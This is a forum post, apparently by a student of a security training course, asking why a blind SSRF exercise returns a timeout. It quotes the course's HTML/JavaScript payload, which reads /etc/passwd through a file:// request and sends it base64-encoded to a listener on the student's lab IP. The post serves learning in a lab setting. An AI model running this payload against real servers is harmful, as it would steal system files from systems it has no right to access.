Blind SSRF Exploitation Example

Off-topic
1

I try and upload the following example code, which is taken directly from the module section, and only modified with my IP address and port (the same IP address and port I’m using in the above examples), I never get a request to my server, and I never get a response from the server for my POST request.

<html>
    <body>
        <b>Exfiltration via Blind SSRF</b>
        <script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest(); // Send the file to our server
        readfile.open("GET","file:///etc/passwd", true); 
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://10.10.15.170:9090/?data='+btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
     </body>
</html>

Only

Error

Timeout in communication with remote server